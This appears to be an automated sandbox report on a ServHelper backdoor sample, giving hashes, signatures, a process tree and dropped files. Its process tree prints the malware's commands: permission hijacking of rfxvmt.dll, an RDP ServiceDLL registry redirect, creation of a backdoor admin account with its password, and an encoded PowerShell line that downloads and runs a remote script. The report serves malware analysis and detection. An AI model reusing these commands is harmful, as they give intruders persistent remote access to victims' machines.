Analysis
-
max time kernel
123s -
max time network
68s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
16-06-2021 10:08
Static task
static1
Behavioral task
behavioral1
Sample
6efc7601be401f3e9b49f4f2cf63fee9.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
6efc7601be401f3e9b49f4f2cf63fee9.exe
Resource
win10v20210410
General
-
Target
6efc7601be401f3e9b49f4f2cf63fee9.exe
-
Size
6.0MB
-
MD5
6efc7601be401f3e9b49f4f2cf63fee9
-
SHA1
6c975b9f64a3e0840c43f11571bc4b1bccdc3d83
-
SHA256
9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724
-
SHA512
87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 11 1652 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1488 icacls.exe 1108 icacls.exe 1716 icacls.exe 1848 takeown.exe 1912 icacls.exe 1656 icacls.exe 1448 icacls.exe 968 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1008 1008 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1912 icacls.exe 1656 icacls.exe 1448 icacls.exe 968 icacls.exe 1488 icacls.exe 1108 icacls.exe 1716 icacls.exe 1848 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ecbca51e-cf77-48c4-89c1-256b1b9452e2 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac48c8ba-a960-4b13-9ba2-274b29db0955 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c92c7012-ad89-4317-80e7-0ca0c5aa7d0f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5fa17bba-6d93-4391-87f1-0d2494b5e9af powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1489e6ef-3da2-4fa3-9302-0487b532c31e powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAYZROMQ7ZO2THTDRTBD.temp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a0e20a9-69c1-41c3-8c37-c82268ebfc22 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9254e15b-add2-45f7-9687-55497be1d2ba powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bfdc98ea-0558-44c2-9712-23bfe1a04ef7 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ab54430-66b0-45a8-a8be-96c25f90f157 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a5930fd0-832c-407e-b0e8-50488971c736 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5311f1cf-24df-4d12-bdf4-b836ab89cb28 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 700f2d279762d701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1396 powershell.exe 1396 powershell.exe 960 powershell.exe 960 powershell.exe 1764 powershell.exe 1764 powershell.exe 1928 powershell.exe 1928 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1652 powershell.exe 1652 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1008 1008 1008 1008 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeRestorePrivilege 1656 icacls.exe Token: SeAssignPrimaryTokenPrivilege 820 WMIC.exe Token: SeIncreaseQuotaPrivilege 820 WMIC.exe Token: SeAuditPrivilege 820 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 820 WMIC.exe Token: SeIncreaseQuotaPrivilege 820 WMIC.exe Token: SeAuditPrivilege 820 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeAuditPrivilege 1588 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeAuditPrivilege 1588 WMIC.exe Token: SeDebugPrivilege 1652 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6efc7601be401f3e9b49f4f2cf63fee9.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 788 wrote to memory of 1396 788 6efc7601be401f3e9b49f4f2cf63fee9.exe powershell.exe PID 788 wrote to memory of 1396 788 6efc7601be401f3e9b49f4f2cf63fee9.exe powershell.exe PID 788 wrote to memory of 1396 788 6efc7601be401f3e9b49f4f2cf63fee9.exe powershell.exe PID 1396 wrote to memory of 572 1396 powershell.exe csc.exe PID 1396 wrote to memory of 572 1396 powershell.exe csc.exe PID 1396 wrote to memory of 572 1396 powershell.exe csc.exe PID 572 wrote to memory of 1488 572 csc.exe cvtres.exe PID 572 wrote to memory of 1488 572 csc.exe cvtres.exe PID 572 wrote to memory of 1488 572 csc.exe cvtres.exe PID 1396 wrote to memory of 960 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 960 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 960 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1764 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1764 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1764 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1928 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1928 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1928 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1848 1396 powershell.exe takeown.exe PID 1396 wrote to memory of 1848 1396 powershell.exe takeown.exe PID 1396 wrote to memory of 1848 1396 powershell.exe takeown.exe PID 1396 wrote to memory of 1912 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1912 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1912 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1656 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1656 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1656 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1448 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1448 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1448 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 968 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 968 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 968 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1488 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1488 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1488 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1108 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1108 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1108 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1716 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1716 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 1716 1396 powershell.exe icacls.exe PID 1396 wrote to memory of 820 1396 powershell.exe reg.exe PID 1396 wrote to memory of 820 1396 powershell.exe reg.exe PID 1396 wrote to memory of 820 1396 powershell.exe reg.exe PID 1396 wrote to memory of 1764 1396 powershell.exe reg.exe PID 1396 wrote to memory of 1764 1396 powershell.exe reg.exe PID 1396 wrote to memory of 1764 1396 powershell.exe reg.exe PID 1396 wrote to memory of 332 1396 powershell.exe reg.exe PID 1396 wrote to memory of 332 1396 powershell.exe reg.exe PID 1396 wrote to memory of 332 1396 powershell.exe reg.exe PID 1396 wrote to memory of 1352 1396 powershell.exe net.exe PID 1396 wrote to memory of 1352 1396 powershell.exe net.exe PID 1396 wrote to memory of 1352 1396 powershell.exe net.exe PID 1352 wrote to memory of 1160 1352 net.exe net1.exe PID 1352 wrote to memory of 1160 1352 net.exe net1.exe PID 1352 wrote to memory of 1160 1352 net.exe net1.exe PID 1396 wrote to memory of 1920 1396 powershell.exe cmd.exe PID 1396 wrote to memory of 1920 1396 powershell.exe cmd.exe PID 1396 wrote to memory of 1920 1396 powershell.exe cmd.exe PID 1920 wrote to memory of 1980 1920 cmd.exe cmd.exe PID 1920 wrote to memory of 1980 1920 cmd.exe cmd.exe PID 1920 wrote to memory of 1980 1920 cmd.exe cmd.exe PID 1980 wrote to memory of 672 1980 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB4.tmp" "c:\Users\Admin\AppData\Local\Temp\gne0it5f\CSC7D194C37303741B193EC4998D4B92816.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VCrq2Nmi /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VCrq2Nmi /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VCrq2Nmi /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VCrq2Nmi1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VCrq2Nmi2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VCrq2Nmi3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_13eae950-77fa-4153-8e51-20b2543aef9dMD5
7f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_194873f5-54bc-48c3-84de-bb76ef3a2d13MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_194eb184-d582-463d-9222-bb3d706a9c2fMD5
6f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_518bdf91-9993-4c20-a6dd-351089e49777MD5
e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7ce354c4-505c-4f89-9359-15220231a83cMD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8de9fa74-e6b4-4059-995b-0169cde3c5c3MD5
faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99ddb745-81ca-4d40-a6af-134398635475MD5
d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
e22a7ed1ee0b35efefe5838362dff35c
SHA1e7c04d18a5993edfde96718d8657c0d9d553ad0d
SHA25687356069921edef3c80299f46b28ee53e269e8960a27c81be027f3153ad5167e
SHA51248f2b7a049022eb3d4ecab3b36dfde4655c43ac50b44ec5bfabc59d03004ae97dbd87604e40d456809b9365f8accca1c2088573f553d92a676684ee23d65d92d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
32024d961bb4ebbed09e3dd977720bb8
SHA16432488ebe99f320f6d067a9a3fc66d08ce26ecb
SHA2567480f761dbf2a9599f2dfafef816b8db4386f441f8aa50388f24c9b2ae524d06
SHA512f5d7dec7ec438f5393bf6c12cbceb1c7cf0386be98d5ee4b4246fdb71865434a28e424e02db69badd26b915575e8cc5a509ed7e03927e254d34b34ca00013c35
-
C:\Users\Admin\AppData\Local\Temp\RESBB4.tmpMD5
4e0bd51aecf2afb16c7886c4b457894b
SHA1f6401b5c7d111d26b172272c23242965473985f9
SHA256f085b329b1a60e79e26519731b1c8cbc6069f929343079a0f5f28fca2f608457
SHA51255457a50285dcb90a29406520ba097ab436c5bf0b87c59543867f5d9586723711fdcefb575e05f5a9b94c89dab71c4f27599258c433a1f648291fc90164d7b2b
-
C:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.dllMD5
140027bfe290ab404084021f83bac7ec
SHA1d9fb4e4b55a78d3080dc03f50520baaff05cc478
SHA256e1d2ffd0e3133ecd67581eb5b7a5f4a1b8fa633f8672b64eb9dc8e71317e41e2
SHA5126deb22938fb84bef866728d516e12e067d5a6e26da1560c5ef89abbfd82677876cf0ec36bb3373aad105f94a01c5b759b4d245c614029a441dd0ef9d78c2fe1d
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
7cc73f9b87540e85212f709eafca7ea8
SHA13f43a1e1044dfb8d3354f055a5461d265719fa0e
SHA2567147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5
SHA512c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
06d56e9bd6a654afd44839be3ceec699
SHA1cfc820a21c101b0f54c807494bd73dc9efa95643
SHA256d1ecda791923ca0ae98bcff84c9d620c3bf3ac3fccf909dd3a6ea6597299ac07
SHA51236488253d7c4f90b5980a1865911b5f6ba5f5483c203c14218ecdd6a3399a704be26a98fc610fdd87e1967dd198cf71c05278304dcb3b4c9b43d9ee0c4632e71
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
06d56e9bd6a654afd44839be3ceec699
SHA1cfc820a21c101b0f54c807494bd73dc9efa95643
